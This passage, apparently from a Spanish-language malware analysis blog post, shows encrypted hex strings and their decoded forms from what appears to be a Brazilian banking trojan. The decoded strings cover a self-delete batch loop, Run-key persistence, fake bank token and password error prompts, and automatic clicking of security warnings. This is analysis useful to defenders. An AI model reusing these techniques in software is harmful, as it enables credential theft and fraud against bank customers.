<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">54E06F8D9DD515213FDC</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">46D46198F77FD20FCA75D929C21C4FF65121372445D877F778FB1773</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F370FC7F9FDB141915191154</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CC6795343983C14CF716CF01</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">94A6B0C7A6DA76AC689E4986B326B86DA7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C852D2102C5E868D96A5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C050DC1F265887</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6EF972F5056FA4B3B4BA5DAA97</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">131CCC012A5EE51CC679A7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">7F95B414C7389B4AF42BD1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C6538B31E87DD70E34EB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">82A15DFC21</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FA0F379C5CF26197B156</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">193AE57792</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2436EC5289DD7DA856F4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">35E51CA244</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8E9CA2C757AF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">808A90D650</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6BFF1A5138B630C2412E32905FB4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">69EB718A81FF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BF4AD42C0375F70501036F8BA72F65</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C241C43ECD2A4FE566E260</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6BF71952EA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F6050763E301748E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">75FA0D61EA02758480</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">71F9047BD22ABD6D9BF4085F8EC90C3E56</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">57E37EF555A83CE3006FF457E264FF3395E8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6F8584E3778EF9010F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FC0D29402F4691B85738C90DDA7CDC7BE80868</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">5BE9668484E20003</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6AF01346F457FC28C773DF1DD175E81EBB71A69ED41CD975D471914D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">818FB71732AD25010D3AE0648BC3</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F27E99EE78F50113</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">70839CED087AFA69D4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">070E19</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0E172051D9</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">292B394F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F8051061</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8FA5AFCD6E9C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">65FF007389FD74F9</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">4CC97FDE0E4A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">57ED144AF2598CBA698A80D860F06E95CD10C16388</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6EFE017D85E306</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A9BA49A5AAC3333A36</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2C32CF262345B8BF48</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">67F70576F0096AF772FC</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">64FF0C68E51E56</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">41C954AB82FB6B92BE91963FFA72E918B64AE851A54BE16BEA38</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">77839FD6B5C81CC360CF55FD0578D3025CEF126AE31461F559FB1A7384B42D95412D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">4CD45397A7C1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D465F1096083DE0739E801443EA123CB062404</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">DC63E1061550B0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">34C653AA81E27EA65988A0241E4295419E50C5B0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">99A7A5C952A7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D465F1096083DE0739E801443EBD1FD77689A94156FB08598ECC69C5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">050B195DED7189</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">658EBB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ED1537A8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">5EC16FE341</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">50FA21</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BD6C983C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BBA45BF86E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">98BE69FA10</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">4DE911B0</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">5738D0022FA3FA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F207136AC121B051F32DDD79C30042E075B497A33E0F26B4194C2B</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A6B441B8B2C820</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A9B14CA38AE46E91F8709530CB0B19C30427D81343F60D03</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D05DF80E17549091ADA1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">202A344B225B8AB15E31369E5A49BC6FE80B33FE57263295CE73A581</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">35C550A786FF5786A28D9A3BC6D529D373B55893C3B2489A8AD90A37A884F65D82B16EDD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D15CF97AF375FE0A111D25</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">60EA778EFD77EE1ECAA5A223DE1CB363E1012CD575C453F46ED20561</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F8011D543BB222C966C95FE7135087BC0726D761FA4AE170A030E410412D5DE715C27DEC</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C04DE80E106A9BA3AD4EED</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">45D56097F60E5980AC8380C078FE5F8DC76486A1221301469F20C8A2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">748690E747BE16C562CD5BFB076FEF1C48E40520A495558595CC0732A38FE36E9343FD6D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">62E36F85</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2436C038176EF921CFA0AEC45142B163FB22D2AD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F6031F5635489F4FFD51DF1606154DEB3BF027C31263F1558E33E540</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">060A19</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">77839FD6B5C81CC360CF5B95EF0244E86887E9</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FB0E285FCE26B159F757D22D17B226035F82B54F58C868E269EE55</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A0A0AC31C82057E962</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E8718DE444A73BDB0C35D571CB3C934380B96394C07382C2D5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0F111F43DA1A64</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">38C25F96F575EC1537EA03463CBC303BB4A59E99</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2535C1391065F018341B1263F3275A8BC36A9AE5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BB4EE8006F86D17997F870819D8ECA69BE74A44195E473D40EB265C1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A5ABB93E33B53F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">4FDB669D8CEF6383A55BF3572D5DE2134BE90824AE708497CD0133D509267A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D15EEA0F1C5C99A7B5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FA0F2B42294A99B96A97B71369993FF75694B673DF0331629C24D172E61C4C9BFA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">45D56097F60E5980AC8389CF6BFC5086DE1E7DE66C84AF2C7F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">48D26F86E51FB66682ED7CDA66F96DA53EFD5D9F3607399F24B3949C21C60E4B2A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">60EA778EFD7DD47DAF51F95D274885B52CC9AF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">AFBB46BDACCF0323C57B93370D63F91EA3593F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">47C946AAB13340D662</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">93A7B3CAA1D4002FDDB24ABF549BEE4ABC618958F045</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D465F1096095C06884EB738094DB2F0A43F456E36085B3E012B05D9A3A11</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CF50DC011855</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1327334A214291B1528FBF1B619CA5568CAE5D25BE75C027BC19C562B5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ED72FE63FB74FE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C257E31B72F16181A35D8DC8B2C0063C9251F13E84A75C4C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C35BE2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EF007E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">42DE5E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">54E6738AE1055C8CA48B9DCA6CE231DF798ABD7FC275CD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8B9FBB331A598C462FD20E1A2BBF062CA3BC6992CE65DD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E163E50A1B0F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">9AA0BA32195A8D472ED30F1B24A4DF085E95B97FE61D2BBCEF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">5AC0AAE7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">53FB29BE61E66688B853F86893306C9330C6</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6184BF1139AD173EE45CF3579E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">28CD66E4044056FC26C861F23CAC2E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">AE5F84DD0D459040EC2FEE648984D70E49</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">92BC62FB134F86BD6A924A9F55F26A94C277A58BDB1EDB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">4CC97FDE0E4A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1A2AD007379DC87FAD45CB0C37A927CC0527DA0C5FF0166498</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0E172051D9</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">353FD8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A1ADBB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">959CAB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0322CDCB63E179E30FCE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">DC7890CE7EDE77AD46F62CAC</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">7A9BB4D27ADA7E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F71E3696B0EC6F9A4BFB2660903795</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">97BF68E81F7DDF0B3BEB16B772E4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EC0923A34242984CFA2BD50D26AB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">80A64181A7E56497B76E9035C114</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E0052FAF56B72CCAB15A85C6</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">13CE7DDF0558F71FC9779733094F8CBD04BBDC140336CEDD61F01FDD608DC886A3</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0B19C118C00B5A88A44EDC7D84D47291C164955784978C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">070E19</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F31AC10627AA2FD00C6389DE17B129D20D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E1123A98419136DE0D301241EA6BAB4B8A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D50E26A45585C56E9A42FC56908DC277D352F732</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1FD10047399F37E11FCF72E212B7143C87A040FD1B2FCB0A085C89</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C57E9635E574D47DAB51FA5C963AAD64F235DD67E442F053F029CC76</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">999CB4133A9A8C9BB56B93C075EA6291869848F152EA02</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6382AA29C00315CC679A4390A43AAD65B245F40EB67188</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">7C88BE15C50E598FBD55DB7C87D9779C35F729FA60E2718CD024</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8FA5AFCD6E9C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">32E2055886D80B30ED12CA18DE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">13C162F524BA29D6</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">94A043964599CB71</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">7C88BE15C50E598FBD55DB7C87D9779C35F729FA60E2798FD12122</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">65FF007389FD74F9</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">AB48E07ABE13779A43F669FF2864858BE376FA72EC0A3B933C5C8BB4143B9331E00B</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BB58F06AAE23759E4BF52829CC055AFE28DE0733AF7381DE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">87B76FD375D4759E5AF319B3459D3EE07384AE7FD7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EE25C70F3491E213CC76</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">54F01BB461F11639E117095F8B</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">DE0F3498B117B35D98B55BFD33AF2CD67086</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6F85BD14C40F46FC2BC84787B225A240925584A535293BB2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">292B394F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">51F41FBD6DEF26CB09256C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">012DE87AA3E2709B4021CF76</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A75683D4064880AD588BA020C9</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">54F11AB868E76791BF7FA729C6</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">58CCB5E5024282A752</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">9A43FE5089CA063CE619CB0E3592C97BD7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8DA75EF425AF27DD0A2927A75385C260F235E40655CF7181</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F8051061</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CC6795343983C14CF716CF01</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Se decodifican como:</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bat</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Erase </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">If exist </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Goto 1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Open</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">TempExe.exe</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">TempExe.zip</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CSIDL_APPDATA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Temp.zip</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">True</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Software\Microsoft\Windows\CurrentVersion\Run</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TB#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Código informado é inválido </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#ASSI#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Assinatura eletrônica informada é inválida </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Número de série informado é inválido </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#NS#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Token informado é inválido</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Token informado é inválido </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TKSMS#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Token informado é inválido </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#ASSI#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Assinatura eletrônica informada é inválida </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Token informado é inválido </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#DTN#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Informaçao de Data é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SN6#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha informada é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TB#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Código informado é inválido</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">iToken informado é inválida </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Informações de Segurança</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SunAwtDialog</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Internet Explorer</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">#32770</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Button</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Advertência de Segurança</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">DirectUIHWND</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CtrlNotifySink</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Permitir</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#SN6#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha informada é inválida</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#TK#</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">iToken informado é inválida </span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">PASSW#DTN#</span></div>
<div class="separator" style="clear: both;">
